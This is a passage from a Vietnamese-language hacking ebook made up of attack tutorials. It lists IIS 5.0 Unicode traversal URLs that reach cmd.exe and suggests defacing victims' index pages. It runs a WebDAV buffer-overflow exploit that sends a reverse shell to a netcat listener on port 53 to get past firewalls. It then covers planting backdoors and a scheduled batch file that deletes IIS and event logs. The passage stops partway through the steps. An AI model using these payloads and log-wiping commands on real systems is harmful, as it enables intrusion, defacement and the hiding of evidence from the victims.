Tải bản đầy đủ (.pdf) (6 trang)

Hacker Professional Ebook part 23 pptx

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (136.39 KB, 6 trang )

Trên Windows NT, để đặt Netcat ở chế độ lắng nghe, không cần phải có quyền
Administrator, chỉ cần login vào với 1 username bình thường khởi động Netcat là
xong.
Chú ý: bạn không thể chạy netcat với -u -e cmd.exe hoặc u -e /bin/sh vì
netcat sẽ không làm việc đúng. Nếu bạn muốn có một UDP shell trên Unix, hãy
dùng udpshell thay cho netcat.

( Dựa theo bài viết của huynh Vicky )

49 . ) Kỹ thuật hack IIS server 5.0 :

_ IIS server với các phiên bản từ trước đến phiên bản 5.0 đều có lỗi để ta có thể
khai thác , do bây giờ hầu hết mọi người đều dùng IIS server 5.0 nên lỗi ở các
phiên bản trước tôi không đề cập đến . Bây giờ tôi sẽ bày các bạn cách hack thông
qua công cụ activeperl và IE , các bạn có thể vận dụng cho các trang Web ở VN vì
chúng bị lỗi này rất nhiều . Ta hãy bắt đầu nhé .
_ Trước hết các bạn hãy download activeperl và Unicode.pl .
_ Sử dụng telnet để xác định trang Web ta tấn công có sử dụng IIS server 5.0 hay
không :

CODE
telnet < tên trang Web > 80
GET HEAD / HTTP/1.0


Nếu nó không báo cho ta biết mục tiêu đang sử dụng chương trình gì thì các bạn
hãy thay đổi cổng 80 bằng các cổng khác như 8080, 81, 8000, 8001 .v.v…
_ Sau khi đã xác định được mục tiêu các bạn vào DOS gõ :

CODE
perl unicode.pl


Host: ( gõ địa chỉ server mà các bạn muốn hack )
Port: 80 ( hoặc 8080, 81, 8000, 8001 tuỳ theo cổng mà ta đã telnet trước đó ) .


_ Các bạn sẽ thấy bảng liệt kê lỗi ( đã được lập trình trong Unicode.pl ) như sau :

CODE
[1] /scripts/ %c0%af /winnt/system32/cmd.exe?/c+
[2]/scripts %c1%9c /winnt/system32/cmd.exe?/c+
[3] /scripts/ %c1%pc /winnt/system32/cmd.exe?/c+
[4]/scripts/ %c0%9v /winnt/system32/cmd.exe?/c+
[5] /scripts/ %c0%qf /winnt/system32/cmd.exe?/c+
[6] /scripts/ %c1%8s /winnt/system32/cmd.exe?/c+
[7] /scripts/ %c1%1c /winnt/system32/cmd.exe?/c+
[8] /scripts/ %c1%9c /winnt/system32/cmd.exe?/c+
[9] /scripts/ %c1%af /winnt/system32/cmd.exe?/c+
[10] /scripts/ %e0%80%af /winnt/system32/cmd.exe?/c+
[11]/scripts/ %f0%80%80%af /winnt/system32/cmd.ex e?/c+
[12] /scripts/ %f8%80%80%80%af /winnt/system32/cmd.exe ?/c+
[13]/scripts/ %fc%80%80%80%80%af /winnt/system32/ cmd.exe?/c+
[14]/m c/ \%e0\%80\%af / \%e0\%80\%af / \%e0
\%80\%af /winnt/system32/cmd.exe?/c+
[15]/cgi-bin/ %c0%af %c0%af %c0%af %c0%af %c0%
af /winnt/system32/cmd.exe?/c+
[16]/samples/ %c0%af %c0%af %c0%af %c0%af %c0%
af /winnt/system32/cmd.exe?/c+
[17]/ii mpwd/ %c0%af %c0%af %c0%af %c0%af %c
0%af /winnt/system32/cmd.exe?/c+
[18]/_vti_cnf/ %c0%af %c0%af %c0%af %c0%af %c0
%af /winnt/system32/cmd.exe?/c+

[19]/_vti_bin/ %c0%af %c0%af %c0%af %c0%af %c0
%af /winnt/system32/cmd.exe?/c+
[20]/adsamples/ %c0%af %c0%af %c0%af %c0%af %c
0%af /winnt/system32/cmd.exe?/c+


Các bạn sẽ thấy được tất cả các lỗi trên nếu trang Web nạn nhân bị tất cả những lỗi
như vậy , nếu server của nạn nhân chỉ bị lỗi thứ 13 và 17 thì bảng kết quả chỉ xuất
hiện dòng thứ 13 và 17 mà thôi .
Tôi lấy VD là bảng kết quả cho tôi biết trang Web nạn nhân bị lỗi thứ 3 và 7 , tôi
sẽ ra IE và nhập đoạn mã tương ứng trên Address :

%c1%p c /winnt/system32/cmd.exe?/c+ < == lỗi
dòng thứ 3
hoặc
%c1%1 c /winnt/system32/cmd.exe?/c+ < == lỗi
dòng thứ 7

Đến đây các bạn đã có thể xâm nhập vào server của nạn nhân rồi đó , các bạn
hãy sử dụng lệnh trong DOS mà khai thác thông tin trong này . Thông thường
các trang Web nằm ở thư mục vinetpub\wwwroot , các bạn vào được rồI thì
chỉ cần thay index.html vớI tên hack by …. Là được rồi , đừng quậy họ nhé .

Trở thành HACKER phần 9

50 . ) Kỹ thuật hack server thông qua lỗi tràn bộ đệm WebDAV :

_ Giới thiệu : Giao thức World Wide Web Distributed Authoring and Versioning
(WebDAV) là một tập hợp các mở rộng cho giao thức HTTP dùng để cung cấp
một cách thức chuẩn cho việc biên tập và quản lý file giữa các máy tính trên

Internet. Lỗi tràn bộ đệm đã được phát hiện trong một thành phần của Windows
2000 được sử dụng bởi WebDAV có thể cho phép kẻ tấn công chiếm quyền điều
khiển máy tính .
_ Chuẩn bị : Ngoài những đồ nghề đã giới thiệu ở các bài trước , các bạn hãy vào
down thêm www32.brinkster.com/anhdenday/wb.zip extract để ở trong C:\
_ Khai thác :
+ Tìm một trang Web dùng IIS 5.0
+ Vào Dos , vào đặt NETCAT ở chế độ lắng nghe :

CODE
C:\>nx -vv -l -p 53
listening on [any] 53


Ta để nó lắng nghe ở cổng 53 vì tường lửa ko chặn cổng này .

+ Mở thêm một của sổ DOS nữa .
+ Ta sử dụng WebDAV vừa down về .

c:\wb.exe <IP của máy chủ IIS> <IP của máy tính của mình dùng để tấn công>
<cổng lắng nghe> [padding=1,2,3 ]

VD :

CODE
C:\> webdav xxx.xxx.xxx.xxx 203.162.xxx.xxx 53 1
[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]
www.coromputer.net && undernet #coromputer

Checking WebDav on 'xxx.xxx.xxx.xxx' FOUND

exploiting ntdll.dll through WebDav [ret: 0x00100010]
Connecting CONNECTED
Sending evil request SENT
Now if you are lucky you will get a shell.


+ Nếu như may mắn bạn có thể lấy được shell của máy chủ IIS . Nếu như ở máy
tính dùng để tấn công hiện ra kết quả như sau thì bạn đã có shell rồi đó :

CODE
C:\>nc -vv -l -p 53
listening on [any] 53
connect to [203.162.xxx.xxx] from xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx] 1125
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32> < OK đã thành công rùi. :mellow: :mellow: :mellow:


+ Khi đã có shell rồi việc đầu tiên là ta sử dụng các lệnh trong Unix để khai thác ,
sau đó up lên server vài con backdoor , he he . ( Sử dụng con WinShell, Hack
Defensed là ok rùi ) .
+ Sau khi làm xong ta sẽ xoá file log , để xác định file log ta thực hiện câu truy vấn
sau :

CODE
C:\WINNT\system32>reg query
HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters /v
LogFileDirectory ! REG.EXE VERSION 2.0



kết quả nó sẽ xuất hiện link để ta xác định file log :

CODE
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Para
meters LogFileDirectory REG_SZ C:\WINNT\System32\LogFiles


He he , đường dẫn file log là C:\WINNT\System32\LogFiles
+ Ta tạo một file a.bat trên máy của nạn nhân để thực hiện việc xoá file log này , ta
đánh các lệnh sau :

CODE
C:\WINNT\system32>echo iisreset /stop >a.bat ' tạm dừng server IIS
C:\WINNT\system32>echo rd /q /s C:\WINNT\System32\LogFiles >>a.bat ' xóa
nhật kí của IIS
C:\WINNT\system32>echo iisreset /start >>a.bat ' khởi động lại IIS
C:\WINNT\system32>echo ce >>a.bat ' xóa nhật kí của Event Log
C:\WINNT\system32>echo del a.bat >>a.bat ' xóa file a.bat


+ Sau đó ta dùng các lệnh sau để cho flie a.bat kia làm việc :

CODE
C:\WINNT\system32>net time \xxx.xxx.xxx.xxx ' lấy thời gian hiện tại của máy
chủ


Nó sẽ cho kết quả như VD sau :


CODE
Current time at \xxx.xxx.xxx.xxx is dd/mm/yy 3:00 PM
The command completed successfully
.

Như vậy thờI gian hiện tạI trên máy chủ là 15:00 , ta sẽ cho file a.bat làm việc sau
5 phút nữa bằng lệnh sau :

CODE
C:\WINNT\system32>at 15:05 a.bat
Added a new job with job ID = 1


Ta có thể mặc đinh cho file a.bat tự động làm việc sau bao lâu là tuỳ vào thông số
thời gian bạn đưa vào .
Ta thoát khỏi máy chủ bằng lệnh :

CODE

×